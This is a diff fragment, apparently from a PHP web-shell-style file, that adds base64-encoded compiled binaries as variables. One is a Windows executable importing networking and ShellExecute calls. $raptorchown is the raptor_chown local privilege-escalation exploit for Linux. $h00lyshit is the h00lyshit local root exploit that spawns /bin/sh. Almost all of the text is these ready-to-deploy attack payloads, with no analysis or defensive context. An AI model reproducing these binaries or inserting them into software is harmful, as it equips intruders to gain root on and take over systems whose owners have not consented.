+SICICIBweEREREREREREREiAiAiAcHhERERERERERERERERERHB4iIiIiIiIiIiIiIiIiIhwd3d3
+d3d3d3d3d3d3d3d3cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/////wAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////////
+///MlAEAAAABAAEAICAEAAEABADoAgAAAQAAAAAAAAAAAAAAAABQxQEACMUBAAAAAAAAAAAAAAAA
+AF3FAQAYxQEAAAAAAAAAAAAAAAAAasUBACDFAQAAAAAAAAAAAAAAAAB0xQEAKMUBAAAAAAAAAAAA
+AAAAAIHFAQAwxQEAAAAAAAAAAAAAAAAAjcUBADjFAQAAAAAAAAAAAAAAAACYxQEAQMUBAAAAAAAA
+AAAAAAAAAKTFAQBIxQEAAAAAAAAAAAAAAAAAAAAAAAAAAACwxQEAvsUBAM7FAQAAAAAA3MUBAAAA
+AADqxQEAAAAAAPTFAQAAAAAABMYBAAAAAAAUxgEAAAAAAB7GAQAAAAAALsYBAAAAAABLRVJORUwz
+Mi5ETEwAYWR2YXBpMzIuZGxsAGdkaTMyLmRsbABvbGVhdXQzMi5kbGwAc2hlbGwzMi5kbGwAdXNl
+cjMyLmRsbAB3aW5pbmV0LmRsbAB3c29jazMyLmRsbAAAAExvYWRMaWJyYXJ5QQAAR2V0UHJvY0Fk
+ZHJlc3MAAEV4aXRQcm9jZXNzAAAAUmVnRW51bUtleUEAAABUZXh0T3V0QQAAU3lzRnJlZVN0cmlu
+ZwAAAFNoZWxsRXhlY3V0ZUEAAABTZXRGb2N1cwAASW50ZXJuZXRPcGVuQQAAAHNlbmQAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJFRU
+Wdfb08/q3OiZ0eXTbpynnqlyfKdzc3NiXaFemV+lYJ1tYVdh1OXK1tbYm9vo02Hp8MnR0+SWzNnY
+ZVtSoFJcTlRPp5avqVzj4NrWosfQ1VBaUFrzrZi+wZ2ooauorLiWqJK8rLazkrimo5mVmJq3rquX
+tKahmaip8li6s8aGztfv2s7TzFysw7iMwNPh3NrL2FQ=";
+
+$raptorchown="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
+Q29weXJpZ2h0IChjKSAyMDA0IE1hcmNvIEl2YWxkaSA8cmFwdG9yQDB4ZGVhZGJlZWYuaW5mbz4A
+AAAAAAAAAHJhcHRvcl9jaG93bi5jIC0gc3lzX2Nob3duIG1pc3NpbmcgREFDIGNvbnRyb2xzIG9u
+IExpbnV4ACVzCiVzCgoAdXNhZ2U6ICVzIGZpbGVfbmFtZQoKAEVycm9yOiBOb3QgdnVsbmVyYWJs
+ZSEKAEVycm9yAE5pbnBvdTogc3lzX2Nob3duIG5vIGp1dHN1IQoAL2Jpbi9scyAtbCAlcwAAAAAA
+AAAAAOSYBAgAAAAAAQAAAAEAAAAMAAAAnIMECA0AAADIhgQIBAAAAEiBBAgFAAAAYIIECAYAAACQ
+gQQICgAAAJcAAAALAAAAEAAAABUAAAAAAAAAAwAAAOyYBAgCAAAASAAAABQAAAARAAAAFwAAAFSD
+BAgRAAAARIMECBIAAAAQAAAAEwAAAAgAAAD+//9vFIMECP///28BAAAA8P//b/iCBAgAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////AAAAAP////8AAAAA
+AAAAABCYBAgAAAAAAAAAAMqDBAjagwQI6oMECPqDBAgKhAQIGoQECCqEBAg6hAQISoQECAAAAAAA
+R0NDOiAoR05VKSAzLjMuMyAocmVsZWFzZSkAAEdDQzogKEdOVSkgMy4zLjMgKHJlbGVhc2UpAABH
+Q0M6IChHTlUpIDMuMy4zIChyZWxlYXNlKQAAR0NDOiAoR05VKSAzLjMuMyAocmVsZWFzZSkAAEdD
+QzogKEdOVSkgMy4zLjMgKHJlbGVhc2UpAABHQ0M6IChHTlUpIDMuMy4zIChyZWxlYXNlKQAALnN5
+bXRhYgAuc3RydGFiAC5zaHN0cnRhYgAuaW50ZXJwAC5ub3RlLkFCSS10YWcALmhhc2gALmR5bnN5
+bQAuZHluc3RyAC5nbnUudmVyc2lvbgAuZ251LnZlcnNpb25fcgAucmVsLmR5bgAucmVsLnBsdAAu
+aW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5kYXRhAC5laF9mcmFtZQAuZHluYW1pYwAuY3RvcnMA
+LmR0b3JzAC5qY3IALmdvdAAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAABsAAAABAAAAAgAAABSBBAgUAQAAEwAAAAAAAAAAAAAAAQAAAAAAAAAj
+AAAABwAAAAIAAAAogQQIKAEAACAAAAAAAAAAAAAAAAQAAAAAAAAAMQAAAAUAAAACAAAASIEECEgB
+AABIAAAABAAAAAAAAAAEAAAABAAAADcAAAALAAAAAgAAAJCBBAiQAQAA0AAAAAUAAAABAAAABAAA
+ABAAAAA/AAAAAwAAAAIAAABgggQIYAIAAJcAAAAAAAAAAAAAAAEAAAAAAAAARwAAAP///28CAAAA
++IIECPgCAAAaAAAABAAAAAAAAAACAAAAAgAAAFQAAAD+//9vAgAAABSDBAgUAwAAMAAAAAUAAAAB
+AAAABAAAAAAAAABjAAAACQAAAAIAAABEgwQIRAMAABAAAAAEAAAAAAAAAAQAAAAIAAAAbAAAAAkA
+AAACAAAAVIMECFQDAABIAAAABAAAAAsAAAAEAAAACAAAAHUAAAABAAAABgAAAJyDBAicAwAAFwAA
+AAAAAAAAAAAABAAAAAAAAABwAAAAAQAAAAYAAAC0gwQItAMAAKAAAAAAAAAAAAAAAAQAAAAEAAAA
+ewAAAAEAAAAGAAAAVIQECFQEAAB0AgAAAAAAAAAAAAAEAAAAAAAAAIEAAAABAAAABgAAAMiGBAjI
+BgAAGwAAAAAAAAAAAAAABAAAAAAAAACHAAAAAQAAAAIAAAAAhwQIAAcAAAABAAAAAAAAAAAAACAA
+AAAAAAAAjwAAAAEAAAADAAAAAJgECAAIAAAMAAAAAAAAAAAAAAAEAAAAAAAAAJUAAAABAAAAAgAA
+AAyYBAgMCAAABAAAAAAAAAAAAAAABAAAAAAAAACfAAAABgAAAAMAAAAQmAQIEAgAAMgAAAAFAAAA
+AAAAAAQAAAAIAAAAqAAAAAEAAAADAAAA2JgECNgIAAAIAAAAAAAAAAAAAAAEAAAAAAAAAK8AAAAB
+AAAAAwAAAOCYBAjgCAAACAAAAAAAAAAAAAAABAAAAAAAAAC2AAAAAQAAAAMAAADomAQI6AgAAAQA
+AAAAAAAAAAAAAAQAAAAAAAAAuwAAAAEAAAADAAAA7JgECOwIAAA0AAAAAAAAAAAAAAAEAAAABAAA
+AMAAAAAIAAAAAwAAACCZBAggCQAACAAAAAAAAAAAAAAABAAAAAAAAADFAAAAAQAAAAAAAAAAAAAA
+IAkAAKgAAAAAAAAAAAAAAAEAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAMgJAADOAAAAAAAAAAAAAAAB
+AAAAAAAAAAEAAAACAAAAAAAAAAAAAADQDgAA0AQAABoAAAArAAAABAAAABAAAAAJAAAAAwAAAAAA
+AAAAAAAAoBMAANcCAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUgQQIAAAA
+AAMAAQAAAAAAKIEECAAAAAADAAIAAAAAAEiBBAgAAAAAAwADAAAAAACQgQQIAAAAAAMABAAAAAAA
+YIIECAAAAAADAAUAAAAAAPiCBAgAAAAAAwAGAAAAAAAUgwQIAAAAAAMABwAAAAAARIMECAAAAAAD
+AAgAAAAAAFSDBAgAAAAAAwAJAAAAAACcgwQIAAAAAAMACgAAAAAAtIMECAAAAAADAAsAAAAAAFSE
+BAgAAAAAAwAMAAAAAADIhgQIAAAAAAMADQAAAAAAAIcECAAAAAADAA4AAAAAAACYBAgAAAAAAwAP
+AAAAAAAMmAQIAAAAAAMAEAAAAAAAEJgECAAAAAADABEAAAAAANiYBAgAAAAAAwASAAAAAADgmAQI
+AAAAAAMAEwAAAAAA6JgECAAAAAADABQAAAAAAOyYBAgAAAAAAwAVAAAAAAAgmQQIAAAAAAMAFgAA
+AAAAAAAAAAAAAAADABcAAAAAAAAAAAAAAAAAAwAYAAAAAAAAAAAAAAAAAAMAGQAAAAAAAAAAAAAA
+AAADABoAAQAAAHiEBAgAAAAAAgAMABEAAAAAAAAAAAAAAAQA8f8cAAAA2JgECAAAAAABABIAKgAA
+AOCYBAgAAAAAAQATADgAAADomAQIAAAAAAEAFABFAAAACJgECAAAAAABAA8ASQAAACSZBAgBAAAA
+AQAWAFUAAACchAQIAAAAAAIADABrAAAA2IQECAAAAAACAAwAEQAAAAAAAAAAAAAABADx/3cAAADc
+mAQIAAAAAAEAEgCEAAAA5JgECAAAAAABABMAkQAAAAyYBAgAAAAAAQAQAJ8AAADomAQIAAAAAAEA
+FACrAAAApIYECAAAAAACAAwAwQAAAAAAAAAAAAAABADx/9AAAAAAAAAA4AAAABIAAADhAAAAEJgE
+CAAAAAARABEA6gAAAACHBAgEAAAAEQAOAPEAAAAAAAAAyQEAABIAAAADAQAAAAAAABQAAAASAAAA
+FgEAAACYBAgAAAAAEALx/ycBAAAEmAQIAAAAABECDwA0AQAAYIYECEQAAAASAAwARAEAAAAAAAA0
+AAAAEgAAAGABAAAAAAAAZgAAABIAAAByAQAAnIMECAAAAAASAAoAeAEAACCZBAgEAAAAEQAWAIoB
+AABUhAQIAAAAABIADACRAQAAAJgECAAAAAAQAvH/pAEAABiGBAhIAAAAEgAMALQBAAAgmQQIAAAA
+ABAA8f/AAQAABIUECBEBAAASAAwAxQEAAAAAAADVAAAAEgAAAOIBAAAAmAQIAAAAABAC8f/zAQAA
+AJgECAAAAAAgAA8A/gEAAMiGBAgAAAAAEgANAAQCAAAAAAAAQwAAABIAAAAWAgAAAJgECAAAAAAQ
+AvH/KgIAAAAAAADLAAAAEgAAADoCAAAgmQQIAAAAABAA8f9BAgAA7JgECAAAAAARABUAVwIAACiZ
+BAgAAAAAEADx/1wCAAAAmAQIAAAAABAC8f9vAgAABIcECAQAAAARAA4AfgIAAAAAAAAkAAAAEgAA
+AJECAAAAmAQIAAAAABAADwCeAgAAAAAAAAAAAAAgAAAAsgIAAACYBAgAAAAAEALx/8gCAAAAAAAA
+AAAAACAAAAAAY2FsbF9nbW9uX3N0YXJ0AGNydHN0dWZmLmMAX19DVE9SX0xJU1RfXwBfX0RUT1Jf
+TElTVF9fAF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4
+AGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBfX0pD
+Ul9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAcmFwdG9yX2Nob3duLmMAY2hvd25AQEdMSUJD
+XzIuMQBfRFlOQU1JQwBfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZnByaW50ZkBAR0xJQkNfMi4w
+AF9fZmluaV9hcnJheV9lbmQAX19kc29faGFuZGxlAF9fbGliY19jc3VfZmluaQBfX2Vycm5vX2xv
+Y2F0aW9uQEBHTElCQ18yLjAAc3lzdGVtQEBHTElCQ18yLjAAX2luaXQAc3RkZXJyQEBHTElCQ18y
+LjAAX3N0YXJ0AF9fZmluaV9hcnJheV9zdGFydABfX2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQA
+bWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAF9faW5pdF9hcnJheV9lbmQAZGF0YV9z
+dGFydABfZmluaQBnZXRnaWRAQEdMSUJDXzIuMABfX3ByZWluaXRfYXJyYXlfZW5kAGV4aXRAQEdM
+SUJDXzIuMABfZWRhdGEAX0dMT0JBTF9PRkZTRVRfVEFCTEVfAF9lbmQAX19pbml0X2FycmF5X3N0
+YXJ0AF9JT19zdGRpbl91c2VkAHNwcmludGZAQEdMSUJDXzIuMABfX2RhdGFfc3RhcnQAX0p2X1Jl
+Z2lzdGVyQ2xhc3NlcwBfX3ByZWluaXRfYXJyYXlfc3RhcnQAX19nbW9uX3N0YXJ0X18A";
+
+$h00lyshit="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAgIcECDQAAADYEgAAAAAAADQAIAAHACgAGwAYAAYAAAA0
+AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEA
+AAABAAAAAAAAAACABAgAgAQIbg4AAG4OAAAFAAAAABAAAAEAAAAAEAAAAJAECACQBAhYAQAAxAgA
+AAYAAAAAEAAAAgAAABAQAAAQkAQIEJAECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQI
+IAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1s
+aW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAABQAAABEAAAAdAAAADgAAAAAA
+AAAaAAAAAAAAAAkAAAARAAAAAQAAABAAAAATAAAAAwAAABsAAAALAAAAAAAAABkAAAAPAAAAHAAA
+AAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAA
+AAAAAAcAAAAAAAAAAAAAAAAAAAAKAAAACAAAAAwAAAASAAAADQAAABYAAAAXAAAAGAAAABQAAAAV
+AAAABgAAAAAAAAAAAAAAAAAAAAAAAAAhAAAAAAAAAAgAAAASAAAAYgAAAAAAAABGAAAAEgAAADUA
+AAAAAAAAyQEAABIAAABdAAAAAAAAAFAAAAASAAAAPAAAAAAAAAC+AAAAEgAAAEMAAAAAAAAANgAA
+ABIAAAAaAAAAAAAAAFcAAAASAAAASAAAAAAAAAA6AAAAEgAAACgAAAAAAAAASAAAABIAAAC2AAAA
+AAAAAC4AAAASAAAAEwAAAGCRBAgEAAAAEQAWAIQAAABkkQQIBAAAABEAFgALAAAAAAAAAHwAAAAS
+AAAAwgAAAAAAAAAhAQAAEgAAAHAAAAAAAAAAeQAAABIAAACfAAAAAAAAANUAAAASAAAATgAAAAAA
+AAAnAAAAEgAAAH0AAAAAAAAAKQAAABIAAAAuAAAAAAAAADcAAAASAAAANgAAAHuIBAgvAAAAEgAM
+ALEAAAAAAAAAfAAAABIAAACLAAAAAAAAAMsAAAASAAAAdQAAAAAAAADJAAAAEgAAAGkAAAAAAAAA
+QwAAABIAAACQAAAA6I0ECAQAAAARAA4AVQAAAAAAAAA8AAAAEgAAAHwAAAAAAAAAJAAAABIAAADL
+AAAAAAAAAAAAAAAgAAAAAGxpYmMuc28uNgB3YWl0cGlkAHN0ZG91dABleGVjdmUAZ2V0cGlkAHBy
+Y3RsAG1lbWNweQBwZXJyb3IAZmZsdXNoAG1tYXAAY2htb2QAc3RyY2F0AG1hZHZpc2UAZm9yawBz
+dHJkdXAAbWVtc2V0AG5pY2UAZ2V0Y3dkAHNwcmludGYAc3RkZXJyAGV4aXQAX0lPX3N0ZGluX3Vz
+ZWQAX19saWJjX3N0YXJ0X21haW4Ab3BlbgBzY2hlZF95aWVsZABfX2Z4c3RhdABfX2dtb25fc3Rh
+cnRfXwBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAEA
+AgACAAIAAgABAAIAAgAAAAAAAQABAAEAAAAQAAAAAAAAABBpaQ0AAAIA2gAAAAAAAABUkQQIBhwA
+AGCRBAgFCwAAZJEECAUMAAD4kAQIBwEAAPyQBAgHAgAAAJEECAcDAAAEkQQIBwQAAAiRBAgHBQAA
+DJEECAcGAAAQkQQIBwcAABSRBAgHCAAAGJEECAcJAAAckQQIBwoAACCRBAgHDQAAJJEECAcOAAAo
+kQQIBw8AACyRBAgHEAAAMJEECAcRAAA0kQQIBxIAADiRBAgHEwAAPJEECAcVAABAkQQIBxYAAESR
+BAgHFwAASJEECAcYAABMkQQIBxoAAFCRBAgHGwAAVYnlg+wI6LEBAADoDAIAAOinBwAAycMA/zXw
+kAQI/yX0kAQIAAAAAP8l+JAECGgAAAAA6eD/////JfyQBAhoCAAAAOnQ/////yUAkQQIaBAAAADp
+wP////8lBJEECGgYAAAA6bD/////JQiRBAhoIAAAAOmg/////yUMkQQIaCgAAADpkP////8lEJEE
+CGgwAAAA6YD/////JRSRBAhoOAAAAOlw/////yUYkQQIaEAAAADpYP////8lHJEECGhIAAAA6VD/
+////JSCRBAhoUAAAAOlA/////yUkkQQIaFgAAADpMP////8lKJEECGhgAAAA6SD/////JSyRBAho
+aAAAAOkQ/////yUwkQQIaHAAAADpAP////8lNJEECGh4AAAA6fD+////JTiRBAhogAAAAOng/v//
+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
